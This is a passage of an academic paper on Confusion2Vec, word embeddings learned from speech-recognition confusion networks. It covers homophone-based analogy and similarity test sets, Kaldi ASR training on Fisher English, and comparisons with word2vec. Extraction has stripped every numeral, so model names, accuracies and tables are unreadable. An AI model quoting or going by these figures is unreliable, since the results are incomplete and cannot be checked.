designed to test semantic–acoustic relations and the syntactic–acoustic relationships. in other words, in terms of fig. , the task evaluates both the horizontal and vertical context together. a few examples of this task is listed in table . in the section “creation of evaluation datasets” details the creation of the database. similarity ratings word similarity ratings along with the analogy task the word similarity task (finkelstein et al., ) has been popular to evaluate the quality of word vector representations in the nlp community gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (pennington, socher & manning, ; luong, socher & manning, ; huang et al., ; schnabel et al., ). in this work, we employ the wordsim- dataset (finkelstein et al., ) for the word similarity task. the dataset has a set of word pairs with a diverse range of human annotated scores relating to the similarity/dissimilarity of the two words. the rank-order correlation (spearman correlation) between the human annotated scores and the cosine similarity of word vectors is computed. higher correlation corresponds to better preservation of word similarity order represented by the word vectors, and hence better quality of the embedding vector space. acoustic similarity ratings employing a similar analogous idea to word similarity ratings and extending it to reflect the quality of word confusions, we formulate an acoustic word similarity task. the attempt is to have word pairs scored similar to as in wordsim- database, but with the scores reflecting the acoustic similarity. table lists a few randomly picked examples from our dataset. the dataset generation is described in the section “creation of evaluation datasets”. data and experimental setup database we employ fisher english training part , speech (ldc s ) and fisher english training part , speech (ldc s ) corpora (cieri, miller & walker, ) for training the asr. the corpora consists of approximately , h of telephone conversational speech data sampled at khz. a total of , speakers were involved in the recordings. the speech corpora is split into three speaker disjoint subsets for training, development and testing for asr modeling purposes. a subset of the speech data containing approximately , h were segmented into , , utterances to train the asr. both the development set and the test set consists of , utterances worth h of speech data each. the transcripts contain approximately . million word tokens with , unique entries. experimental setup automatic speech recognition kaldi toolkit is employed for training the asr (povey et al., ). a hybrid dnn-hmm based acoustic model is trained on high resolution ( dimensional) mel frequency cepstral coefficients along with i-vector features to provide speaker and channel information table few examples from acoustic analogy task test-set. word pair word pair i’d eyed phi fie seedar cedar rued rude air aire spade spayed scent cent vile vial cirrus cirrous sold soled curser cursor pendant pendent sensor censor straight strait gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for robust modeling. the carnegie mellon university (cmu) pronunciation dictionary (weide, ) is pruned to corpora’s vocabulary and is used as a lexicon for the asr. a trigram language model is trained on the transcripts of the training subset data. the asr system achieves a word error rates of . % on the development and . % on the test datasets. the decoded lattice is used to generate confusion network based on minimum bayes risk criterion (xu et al., ). the asr output transcriptions resulted in a vocabulary size of , unique word tokens. confusion vec for training the confusion vec, the training subset of the fisher corpora is used. the total number of tokens resulting from the multiple paths over the confusion network is approximately . million words, that is, an average of . alternative word confusions present for each word in the confusion network. a minimum frequency threshold of is set to prune the rarely occurring tokens from the vocabulary, which resulted in the reduction of the vocabulary size from , to , . further, we also subsample the word tokens as suggested by mikolov et al. ( c) which was shown to be helpful. both the frequency thresholding and the downsampling resulted in a reduction of word tokens from . million words to approximately . million words. the confusion vec and word vec are trained using the tensorflow toolkit (abadi et al., ). negative sampling objective is used for training as suggested for better efficiency (mikolov et al., c). for the skip-gram training, the batch-size of was chosen and negative samples were used for computing the table few examples from semantic&syntactic—acoustic analogy task test set. type of relationship word pair word pair currency india rupee korea one (won) canada dollar denmark krona (krone) japan yen sweden krone (krona) family buoy (boy) girl brother sister boy girl king quean (queen) boy girl sun (son) daughter adjective-to-adverb calm calmly sloe (slow) slowly opposite aware unaware possible impassible (impossible) comparative bad worse high hire (higher) superlative bad worst grate (great) greatest present participle dance dancing rite (write) writing past tense dancing danced flying flu (flew) plural banana bananas burred (bird) birds plural verbs decrease decreases fined (find) finds multiple homophone substitutions wright (write) writes sea (see) sees rowed (road) roads i (eye) ayes (eyes) si (see) seize (sees) right (write) writes note: the words in the parenthesis are the original ones as in the analogy test set (mikolov et al., a) which have been replaced by their homophone alternatives. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ negative sampling loss. the skip-window was set to and was trained for a total of epochs. the parameters were chosen to provide optimal performance with traditional word vec embeddings, evaluating for word analogy task, for the size of our database. during fine- tuning, the model was trained with a reduced learning rate and with other parameters unchanged. all the above parameters were fixed for consistent and fair comparison. creation of evaluation datasets acoustic analogy task we collected a list of homophones in english (http://homophonelist.com/homophones-list/ accessed: - - ), and created all possible combinations of pairs of acoustic confusion analogies. for homophones with more than two words, we list all possible confusion pairs. few examples from the dataset are listed in table . we emphasize that the consideration of only homophones in the creation of the dataset is a strict and a difficult task to solve, since the asr lattice contains more relaxed word confusions. semantic and syntactic–acoustic analogy task we construct an analogy question test set by substituting the words in the original analogy question test set from mikolov et al. ( a) with their respective homophones. considering all the five types of semantic questions and nine types of syntactic questions, for any words in the analogies with homophone alternatives, we swap with the homophone. we prune all the original analogy questions having no words with homophone alternatives. for analogies having more than one words with homophone alternatives, we list all permutations. we found that the number of questions generating by the above method, being exhaustive, was large and hence we randomly sample from the list to retain semantic questions and , syntactic questions. table lists a few examples with single and multiple homophone substitutions for semantic and syntactic–acoustic analogy task from our data set. acoustic similarity task to create a set of word pairs scored by their acoustic similarity, we add all the homophone word pairs with an acoustic similarity score of . . to get a more diverse range of acoustic similarity scores, we also utilize all the word pairs from the wordsim- dataset table examples of acoustic similarity ratings. word word acoustic rating wordsim i eye . – adolescence adolescents . – allusion illusion . – sewer sower . – fighting defeating . . day dawn . . weather forecast . . notes: acoustic rating: . = identically sounding, . = highly acoustically dissimilar. wordsim : . = high word similarity, . = low word similarity. word pairs not present in wordsim is denoted by “–”. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://homophonelist.com/homophones-list/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and compute the normalized phone edit distance using the cmu pronunciation dictionary (weide, ). the normalized phone edit distance is of the range between and . the edit distance of refers to the word pair having almost overlap between their respective phonetic transcriptions and thus being completely acoustically dissimilar and vice-versa. we use – “phone_edit_distance” as the acoustic similarity score between the word pair. thus a score of . signifies that the two words are identically sounding, whereas a score of refers to words sounding drastically dissimilar. in the case of a word having more than one phonetic transcriptions (pronunciation alternatives), we use the minimum normalized edit distance. table shows a few randomly picked examples from the generated dataset. finally, for evaluation, the respective corpora are pruned to match the in-domain training dataset vocabulary. table lists the samples in each evaluation dataset before and after pruning. performance evaluation criterion in the original work by mikolov et al. ( a), the efficiency of the vector representation is measured using the accuracy achieved on the analogy test set. but, in our case, note that the semantic and syntactic analogy task and the semantic and syntactic–acoustic analogy task are mutually exclusive of each other. in other words, the model can get only one, either one, of the analogies correct, meaning any increments with one task will result in decrements over the other task. moreover, while jointly modeling two orthogonal information streams (i) contextual co-occurrences, and (ii) acoustic word confusions, finding the nearest word vector nearest to the specific analogy is no longer an optimal evaluation strategy. this is because the word vector nearest to the analogy operation can either be along the contextual axis or the confusion axis, that is, each analogy could possibly have two correct answers. for example, the analogy “write”–“wrote”: “read” can be right when the nearest word vector is either “read” (contextual dimension) or “red” (confusion dimension). to incorporate this, we provide the accuracy over top- nearest vectors, that is, we count the analogy question as correct if any of the top- nearest vectors satisfies the analogy. this also holds for the acoustic confusion analogy tasks, especially for relations involving triplet homophones. for example, the analogy “write”-“right”: “road” can be right when the nearest word vector is either “rode” or “rowed” (for triplet homophones “road”/“rode”/“rowed”). thus, we present evaluations by comparing the top- (nearest vector) evaluation with baseline word vec against the top- evaluation for the proposed confusion vec models. to maintain consistency, we also provide the top- evaluations for the baseline word vec models in the appendix. moreover, since we have three different analogy tasks, we provide the average accuracy among the three tasks in order to have an easy assessment of the performance of various proposed models. results table lists the results for various models. we provide evaluations on three different analogy tasks and two similarity tasks as discussed in the section “evaluation methods.” further, more thorough results with the semantic and syntactic accuracy splits are provided under the appendix to gain deeper insights. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ baseline word vec model we consider two variations of word vec baseline model. first, we provide results with the google’s word vec model (https://code.google.com/archive/p/word vec) which is trained with orders more training data, and is thus a high upper bound on the semantic and syntactic task. the google’s word vec model was pruned to match the vocabulary of our corpora to make the evaluation comparable. second, we consider the word vec model trained on the in-domain ground truth transcripts. the two baseline models result in good performance on semantic&syntactic analogy tasks and word similarity task as expected. the google’s model achieves an accuracy of . % on the semantic&syntactic analogy task. we note that the syntactic accuracy ( . %) is much higher than the semantic accuracy ( . %) (see table a ). this could be due to our pruned evaluation test set (see table ). the in-domain model improves on the semantic accuracy while losing on the syntactic accuracy over the google model (see table a ). the shortcomings of the in- domain model compared to the google word vec on the semantic&syntactic analogy task can be attributed toward the amount of training data and its extensive vocabulary. the in-domain model is trained on . million words vs. the billion of google’s news dataset. moreover, the vocabulary size of in-domain models is approximately , vs. the three million of google (mikolov et al., c) and thus unfair to compare with the rest of the models. further, evaluating the acoustic analogy and semantic&syntactic–acoustic analogy tasks, all the baseline models perform poorly. an unusual thing we note is that the google word vec model performs better comparatively to the in-domain baseline model in the semantic&syntactic–acoustic analogy task. a deeper examination revealed that the model compensates well for homophone substitutions on semantic&syntactic analogies which have very similar spellings. this suggests that the typographical errors present in the training data of the google model results in a small peak in performance for the semantic&syntactic–acoustic analogy task. on the evaluations of similarity tasks, all the baseline models perform well on the word similarity tasks as expected. however, they exhibit poor results on the acoustic similarity task. overall, the results indicate that the baseline models are largely inept of capturing any relationships over the acoustic word confusions present in a confusion network or a lattice. in our specific case, the baseline models are poor in capturing relationships between acoustically similar words. top-confusion—c v- comparing the top-confusion (c v- for short), training scheme with the baseline in-domain word vec model, we observe the baseline model trained on clean data table statistics of evaluation datasets. task total samples retained samples semantic&syntactic analogy , , acoustic analogy , , semantic&syntactic–acoustic analogy , , wordsim- acoustic confusion ratings , gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://code.google.com/archive/p/word vec http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performs better on the semantic&syntactic analogy task as expected. baseline in-domain word vec achieves . % on the semantic&syntactic analogy task whereas the top-confusion model achieves . % (see table a ). however, the performance difference is minimal. this is encouraging because the top-confusion model is trained on the noisy asr transcripts. moreover, we see the noisy transcripts negatively affect the semantic accuracies while the syntactic accuracy remains identical which makes sense (see table a ). similar to the baseline in-domain word vec model, the top-confusion model falls short to google word vec mainly due to the extensive amount of data employed in the latter case. evaluating for acoustic analogies and semantic&syntactic–acoustic analogies, the top-confusion scheme improves slightly over the baseline word vec model. this hints at the ability of the top-confusion model to capture some acoustic word confusions through context (e.g., “take a seat” is expected but sometimes we may see “take a sit”). the improvements are small because in a good quality asr the top confusion network hypotheses contain few errors thus context learning is much stronger and acoustic- confusion learning is minimal. note that the top-confusion model would converge to the baseline word vec model in the case of a zero word error rate. further, inspecting the performance in the similarity task, the top-confusion model exhibits statistically significant positive correlation in the word similarity task, although slightly smaller correlation than the baseline word vec and google word vec model. however, we observe a positive (statistically significant) correlation on the acoustic similarity task, whereas both the baseline word vec and google word vec model exhibit a negative correlation. this further validates the proposed top-confusion model’s capability to capture acoustic word confusions. intra-confusion, c v-a with intra-confusion training (c v-acoustic or c v-a for short) we expect the model to capture acoustically similar word relationships, while completely ignoring any table results: different proposed models. model analogy tasks similarity tasks s&s (%) acoustic (%) s&s–acoustic (%) average accuracy (%) word similarity acoustic similarity google w v . . . . . - . in-domain w v . . . . . - . c v- . . . . . . c v-a . . . . . * . c v-c . . . . . . c v-* . . . . . * . notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter; s&s, semantic & syntactic analogy. all the models are of dimensions except google’s w v which is dimensions. for the analogy tasks: the accuracies of baseline word vec models are for top- evaluations, whereas of the other models are for top- evaluations (as discussed in the section “analogy tasks”). detailed semantic analogy and syntactic analogy accuracies, the top- evaluations and top- evaluations for all the models are available under appendix in table a . for the similarity tasks: all the correlations (spearman’s) are statistically significant with p < . except the ones with the asterisks. detailed p- values for the correlations are presented under appendix in table a . bold entries correspond to the best results in their respective tasks. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ contextual relations. hence, we expect the model to perform well on acoustic analogies and acoustic similarity tasks and to perform poorly on semantic&syntactic analogies and word similarity tasks. the table lists the results obtained using intra-confusion training. the results are in conjunction with our expectations. the model gives the worst results in semantic&syntactic analogy task. however, we observe that the syntactic analogy accuracy to be a fair amount higher than the semantic accuracy (see table a ). we think this is mainly because of syntactically similar words appearing along the word confusion dimension in the confusion networks, resultant of the constraints enforced on the confusion network by the (asr) language model—which are known to perform better for syntactic tasks (mikolov et al., a). the model also gives the highest correlation on the acoustic similarity task, while performing poorly on the word similarity task. inter-confusion, c v-c with inter-confusion training (c v-contextual or c v-c for short), we hypothesized that the model is capable of jointly modeling both the contextual information as well as confusions appearing contextually. hence, we expect the model to perform well on both the semantic&syntactic analogy and acoustic analogy tasks and in doing so result in better performance with semantic&syntactic–acoustic analogy task. we also expect the model to give high correlations for both word similarity and acoustic similarity tasks. from table , we observe that as hypothesized the inter-confusion training shows improvements in the semantic&syntactic analogy task. quite surprisingly, the inter-confusion training shows better performance than the intra-confusion training for the acoustic analogy task, hinting that having good contextual representation could mutually be beneficial for the confusion representation. however, we don’t observe any improvements in the semantic&syntactic–acoustic analogy task. evaluating on the similarity tasks, the results support the observations drawn from analogy tasks, that is, the model fares relatively well in both word similarity and acoustic similarity. hybrid intra–inter confusion, c v-� the hybrid intra–inter confusion training (c v-� for short) introduces all confusability and allows learning directly confusable acoustic terms, such as in the c v-a case, and contextual information that incorporates confusable terms, as in the inter or c v-c case. this model shows comparable performance in jointly modeling on both the semantic&syntactic and acoustic analogy tasks. one crucial observation is that it gives significantly better performance with the semantic&syntactic–acoustic analogy task. this suggests that jointly modeling both the intra-confusion and inter-confusion word mappings is useful. however, it achieves better results by compromising on the semantic analogy (see table a ) accuracy and hence also negatively affecting the word similarity task. the model achieves good correlation on the acoustic similarity task. overall, our proposed confusion vec models capture significantly more useful information compared to the baseline models judging by the average accuracy over the analogy tasks. one particular observation we see across all the proposed models is that the performance remains fairly poor for the semantic&syntactic–acoustic analogy task. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this suggests that the semantic&syntactic–acoustic analogy task is inherently hard to solve. we believe that to achieve better results with semantic&syntactic–acoustic analogies, it is necessary to have a robust performance on one of the tasks (semantic&syntactic analogies or acoustic analogies) to begin with, that is, better model initialization could help. next, we experiment with model initializations/pre-training. model initialization/pre-training table lists the results with model initialization/pre-training. the in-domain word vec baseline model and the top-confusion models are initialized from the google word vec model. pre-training the models provide improvements with semantic&syntactic analogy results to be close and comparable to that of the google’s word vec model. empirically, we find the top-confusion model inherits approximately similar contextual information as the baseline models, and in addition outperforms the baseline in average accuracy. thus, for future experiments we adopt the top-confusion model (rather than word vec model) for initialization, model concatenation, and joint-training. the remaining models (c v-a, c v-c, and c v-�) are initialized from the top-confusion model (i.e., c v- , the top-confusion model initialized from google word vec), since this would enable full compatibility with the vocabulary. since the google word vec model is dimensional, this forces all the pre- trained models (table ) to be , as opposed to dimensions (table ). for intra-confusion model, the pre-training provides drastic improvements on semantic&syntactic analogy task at the expense of the acoustic analogy task. even-though the accuracy of acoustic analogy task decreases comparatively to without pre-training, it remains significantly better than the baseline model. more importantly, the semantic&syntactic–acoustic analogy task accuracy doubles. inter-confusion model does not compromise on the semantic&syntactic analogy tasks, in doing so gives comparable performances to the baseline model. additionally, it also does well on the acoustic table results with pre-training/initialization. model analogy tasks similarity tasks s&s (%) acoustic (%) s&s–acoustic (%) average accuracy (%) word similarity acoustic similarity google w v . . . . . - . in-domain w v . . . . . - . c v- . . . . . - . c v-a . . . . . . c v-c . . . . . . c v-* . . . . . . notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter; s&s, semantic & syntactic analogy. all the models are of dimensions. for the analogy tasks: the accuracies of baseline word vec models are for top- evaluations, whereas of the other models are for top- evaluations (as discussed in the section “analogy tasks”). detailed semantic analogy and syntactic analogy accuracies, the top- evaluations and top- evaluations for all the models are available under appendix in table a . for the similarity tasks: all the correlations (spearman’s) are statistically significant. detailed p-values for the correlations are presented under appendix in table a . bold entries correspond to the best results in their respective tasks. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and semantic&syntactic–acoustic analogy task as was the case without pre-training. in the case of hybrid intra-inter confusion model, similar trends are observed as was with no pre-training, but with considerable improvements in accuracies. pre-training also helps in boosting the correlations for the word similarity tasks for all the models. overall, we find the pre-training to be extremely useful. model concatenation table (rows - ) lists the results with model concatenation. we concatenate each of the proposed models (table ) with the pre-trained top-confusion model (we use c v- model instead of word vec as hypothesized in fig. b because empirically c v- model provided similar performance on semantic&syntactic tasks and overall better average accuracy on analogy tasks compared to the baseline-in-domain w v model). thus the resulting vector space is dimensional ( (pre-trained top-confusion model) + (proposed models from table )). in our case, we believe the dimension expansion of the vector space is insignificant in terms of performance considering the relatively low amount of training data compared to google’s word vec model. to be completely fair in judgment, we create a new baseline model with dimensional embedding space for comparison. to train the new baseline model, the dimension embedding was initialized with dimensional google’s word vec embedding and the rest of the dimensions as zeros (null space). comparing the dimension baseline from table with the previous dimensional baseline from table , the results are almost identical which confirms the dimension expansion is insignificant with respect to performance. with model concatenation, we see slightly better results (average analogy accuracy) comparing with the pre-trained models from table , an absolute increase of up-to approximately % among the best results. the correlations with similarity tasks are similar and comparable with the earlier results with the pre-trained models. joint optimization fixed contextual subspace rows – of table display the results of joint optimization with concatenated, fixed top-confusion (c v- ) embeddings and learn-able confusion vec (c v-a/c/�) embeddings. as hypothesized with fixed subspace, the results indicate better accuracies for the semantic&syntactic analogy task. thereby, the improvements also reflect on the overall average accuracy of the analogy tasks. this also confirms the need for joint optimization which boosts the average accuracy up-to approximately % absolute over the unoptimized concatenated model. unrestricted optimization the last nine rows of table display the results obtained by jointly optimizing the concatenated models without constraints. both the subspaces are fine tuned to convergence with various proposed training criteria. we consistently observe improvements with the unrestricted optimization over the unoptimized model concatenations. in terms of average accuracy we observe an increase in average accuracy by up-to % (absolute) approximate over the unoptimized concatenated models. moreover, we obtain gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ improvements over the fixed contextual subspace joint-optimized models, up-to – % (absolute) in average accuracies. the best overall model in terms of average accuracies is obtained by unrestricted joint optimization on the concatenated top-confusion and inter-confusion models by fine-tuning with the intra-confusion training scheme. results summary firstly, comparing among the different training schemes (see table ), the inter-confusion training consistently gives the best acoustic analogy accuracies, whereas the hybrid table model concatenation and joint optimization results. model fine-tuning scheme analogy tasks similarity tasks s&s acoustic s&s–acoustic average word acoustic google w v – . % . % . % . % . - . in-domain w v ( dim.) – . % . % . % . % . - . model concatenation c v- (f) + c v-a (f) – . % . % . % . % . . c v- (f) + inter-confusion (f) – . % . % . % . % . . c v- (f) + hybrid intra-inter (f) – . % . % . % . % . . fixed contextual subspace joint optimization c v- (f) + c v-a (l) inter . % . % . % . % . . c v- (f) + c v-a (l) intra . % . % . % . % . . c v- (f) + c v-a (l) hybrid . % . % . % . % . . c v- (f) + c v-c (l) inter . % . % . % . % . . c v- (f) + c v-c (l) intra . % . % . % . % . . c v- (f) + c v-c (l) hybrid . % . % . % . % . . c v- (f) + c v-* (l) inter . % . % . % . % . . c v- (f) + c v-* (l) intra . % . % . % . % . . c v- (f) + c v-* (l) hybrid . % . % . % . % . . unrestricted joint optimization c v- (l) + c v-a (l) inter . % . % . % . % . . c v- (l) + c v-a (l) intra . % . % . % . % . . c v- (l) + c v-a (l) hybrid . % . % . % . % . * . c v- (l) + c v-c (l) inter . % . % . % . % . . c v- (l) + c v-c (l) intra . % . % . % . % . . c v- (l) + c v-c (l) hybrid . % . % . % . % . . c v- (l) + c v-* (l) inter . % . % . % . % . . c v- (l) + c v-* (l) intra . % . % . % . % . . c v- (l) + c v-* (l) hybrid . % . % . % . % . . notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter. all the models are of ( + ) dimensions. acronyms: (f):fixed embedding, (l):learn embedding during joint training, s&s: semantic & syntactic analogy. for the analogy tasks: the accuracies of baseline word vec models are for top- evaluations, whereas of the other models are for top- evaluations (as discussed in the section “analogy tasks”). detailed semantic analogy and syntactic analogy accuracies, the top- evaluations and top- evaluations for all the models are available under appendix in table a . for the similarity tasks: all the correlations (spearman’s) are statistically significant with p < . except the ones with the asterisks. detailed p-values for the correlations are presented under appendix in table a . bold entries correspond to the best results in their respective tasks. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ training scheme often gives the best semantic&syntactic–acoustic analogy accuracies. as far as the semantic&syntactic analogy task is concerned, the intra-confusion is often found to give preference to syntactic relations, while the inter-confusion boosts the semantic relations and the hybrid scheme balances both relations (see table a ). next, pre-training/initializing the model gives drastic improvements in overall average accuracy of analogy tasks. concatenating the top-confusion model with the confusion vec (c v-a/c/�) model gives slightly better results. more optimizations and fine-tuning over the concatenated model gives considerably the best results. overall, the best results are obtained with unrestricted joint optimization of top- confusion and inter-confusion model, that is, fine-tuning using intra-confusion training mode. in terms of average analogy accuracies the confusion vec model (c v-a/c/�) outperforms the baseline by up-to . %. the best performing confusion vec model outperforms the word vec model even on the semantic&syntactic analogy tasks (by a relative . %). moreover, even the comparison between the top- evaluations of both the word vec and confusion vec (c v- /a/c/�) suggests very similar performance on semantic&syntactic-analogy tasks (see table a ). this confirms and emphasizes that the confusion vec (c v- /a/c/�) doesn’t compromise on the information captured by word vec but succeeds in augmenting the space with word confusions. another highlight observation is that modeling the word confusions boost the semantic and syntactic scores of the semantic&syntactic analogy task (compared to word vec), suggesting inherent information in word confusions which could be exploited for better semantic-syntactic word relation modeling. vector space analysis in this section, we compare the vector space plots of the typical word vec space and the proposed confusion vec vector space for a specifically chosen set of words. we choose a subset of words representing three categories to reflect semantic relationships, syntactic relationships and acoustic relationships. the vector space representations of the words are then subjected to dimension reduction using principle component analysis (pca) to obtain d vectors which are used for plotting. semantic relationships for analyzing the semantic relationships, we compile random word pairs (constrained by the availability of these in our training data) representing country–cities relationships. the d plot for baseline pre-trained word vec model is shown in fig. and for the proposed confusion vec model, specifically for the randomly selected, jointly-optimized top-confusion + intra-confusion model (corresponding to row in table ) is displayed in fig. . the following observations can be made comparing the two pca plots: � examining the baseline word vec model, we find the cities are clustered over the upper half of the plot (highlighted with blue hue in fig. ) and countries are clustered together at the bottom half (highlighted with red hue in fig. ). gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � similar trends are observed with the proposed confusion vec model, where the cities are clustered together over the right half of the plot (highlighted with blue hue in fig. ) and the countries are grouped together toward the left half (highlighted with red hue in fig. ). � in the word vec space, the vectors of country–city word pairs are roughly parallel, pointing north-east (i.e., vectors are approximately similar). � similar to the word vec space, with the confusion vec, we observe the vectors of country–city word pairs are fairly parallel and point to the east (i.e., vectors are highly similar).the four observations indicate that the confusion vec preserves the semantic relationships between the words (similar to the word vec space). syntactic relationships to analyze the syntactic relationships, we create pairs of words composed of adjective- adverb, opposites, comparative, superlative, present-participle, past-tense, plurals. the pca d plots for baseline pre-trained word vec model and the proposed confusion vec model are illustrated in figs. and , respectively. the following inferences can be made from the two plots: � inspecting the baseline word vec model, we observe that the word pairs depicting syntactic relations occur often close-by (highlighted with red ellipses in fig. ). � few semantic relations are also apparent and are highlighted with blue ellipses in fig. . for example, animals are clustered together. � similarly, with the confusion vec model, we observe syntactic clusters of words highlighted with red ellipses in fig. . � semantic relations apparent in the case of word vec is also evident with the confusion vec, which are highlighted with blue ellipses in fig. . � additionally, with the confusion vec model, we find clusters of acoustically similar words (with similar phonetic transcriptions). these are highlighted using a green ellipse in fig. . the above findings confirm that the confusion vec models preserve the syntactic relationships similar to word vec models, supporting our hypothesis. acoustic relationships in order to analyze the relationships of similar sounding words in the word vector spaces under consideration, we compose pairs of acoustically similar sounding words, with similar phonetic transcriptions. the d plot obtained after pca for the baseline word vec model is shown in fig. and the proposed confusion vec model is shown in fig. . we make the following observations from the two figures: � observing the baseline word vec model, no apparent trends are found between the acoustically similar words. for example, there is no trivial relationships apparent from the plot in fig. between the word “no” and “know,” “try” and “tri,” etc. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ word vec relationships of countries-cities figure d plot after pca of word vector representation on baseline pre-trained word vecf. demonstration of semantic relationship on randomly chosen pairs of countries and cities. country-city vectors are almost parallel/similar. countries are clustered together on the bottom half (highlighted with red hue) and the cities on upper half (highlighted with blue hue). full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ confusion vec (joint training) relationships of countries-cities figure d plot after pca of word vector representation on jointly optimized pre-trained c v- + c v-a models. demonstration of semantic relationship on randomly chosen pairs of countries and cities. observe the semantic relationships are preserved as in the case of word vec model: country-city vectors are almost parallel/similar. countries are clustered together on the left half (highlighted with red hue) and the cities on right half (highlighted with blue hue). full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ word vec semantic/syntactic illustration via pca figure d plot after pca of word vector representation on baseline pre-trained word vec. demonstration of syntactic relationship on randomly chosen pairs of adjective-adverb, opposites, comparative, superlative, present-participle, past-tense, plurals. observe the clustering of syntactically related words (ex: highlighted with red ellipses). few semantically related words are highlighted with blue ellipses (ex: animals). full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ confusion vec (joint training) semantic/syntactic illustration via pcasemantic/syntactic illustration via pca acoustic and syntactic/ semantic cluster figure d plot after pca of word vector representation on jointly optimized pre-trained c v- + c v-a models. demonstration of syntactic relationship on randomly chosen pairs of adjective-adverb, opposites, comparative, superlative, present-participle, past-tense, plurals. syntactic clustering is preserved by confusion vec similar to word vec. red ellipses highlight few examples of syntactically related words. similar to word vec, semantically related words (ex: animals), highlighted with blue ellipses, are also clustered together. additionally confusion vec clusters acoustically similar words together (indicated with green ellipse). full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ word vec acoustic siimilarity illustration via pca - no obvious clustering figure d plot after pca of word vector representation on baseline pre-trained word vec. demonstration of vector relationship on randomly chosen pairs of acoustically similar sounding words. no apparent relations between acoustically similar words are evident. full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ confusion vec (joint training) acoustic siimilarity illustration via pca - clear clustering acoustic and syntactic cluster figure d plot after pca of word vector representation on jointly optimized pre-trained c v- + c v-a models. demonstration of vector relationship on randomly chosen pairs of acoustically similar sounding words. confusion vec clusters acoustically similar words together (highlighted with blue ellipses). additionally, inter-relations between syntactically related words and acoustically related words are also evident (highlighted with a green ellipse). full-size doi: . /peerj-cs. /fig- gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � however, inspecting the proposed confusion vec model, there is an obvious trend apparent, the acoustically similar words are grouped together in pairs and occur roughly in similar distances. the word pairs are highlighted with blue ellipses in fig. . � additionally, in fig. , as highlighted in a green ellipse, we observe the four words “no,” “not,” “knot,” and “know” occur in close proximity. the word pair “no” and “not” portray semantic/syntactic relation whereas the pairs “knot” & “not” and “no” & “know” are acoustically related. the above findings suggest that the word vec baseline model fails to capture any acoustic relationships whereas the proposed confusion vec successfully models the confusions present in the lattices, in our specific case the acoustic confusions from the asr lattices. discussion in this section, we demonstrate why the proposed embedding space is superior for modeling word lattices with the support of toy examples. let’s consider a simple task of asr error correction. as shown by allauzen ( ), ogata & goto ( ) and shivakumar et al. ( ), often, the information needed to correct the errors are embedded in the lattices. the toy examples in figs. a and b depict the real scenarios encountered in asr. the lattice feature representation is a weighted vector sum of all words in the confusion and its context present in the lattice (see fig. ). we compare the proposed confusion vec embeddings with the popular word vec using cosine similarity as the evaluation measure. table lists the evaluation for the following cases: (i) asr output is correct, (ii) asr output is wrong and the correct candidate is present in the lattice, (iii) asr output is wrong and the correct candidate is absent from the lattice, and (iv) asr output is wrong and with no lattice available. the following observations are drawn from the results: ( ) confusion vec shows higher similarity with the correct answers when the asr output is correct (see table ; example . , . ). ( ) confusion vec exhibits higher similarity with the correct answers when the asr output is wrong—meaning the representation is closer to the correct candidate and therefore more likely to correct the errors (see table ; example . , . , . , . ). ( ) confusion vec yields high similarity even when the correct word candidate is not present in the lattice—meaning confusion vec leverages inherent word representation knowledge to aid re-introduction of pruned or unseen words during error correction (see table ; example . , . , . ). ( ) the confusion vec shows low similarity in the case of fake lattices with highly unlikely word 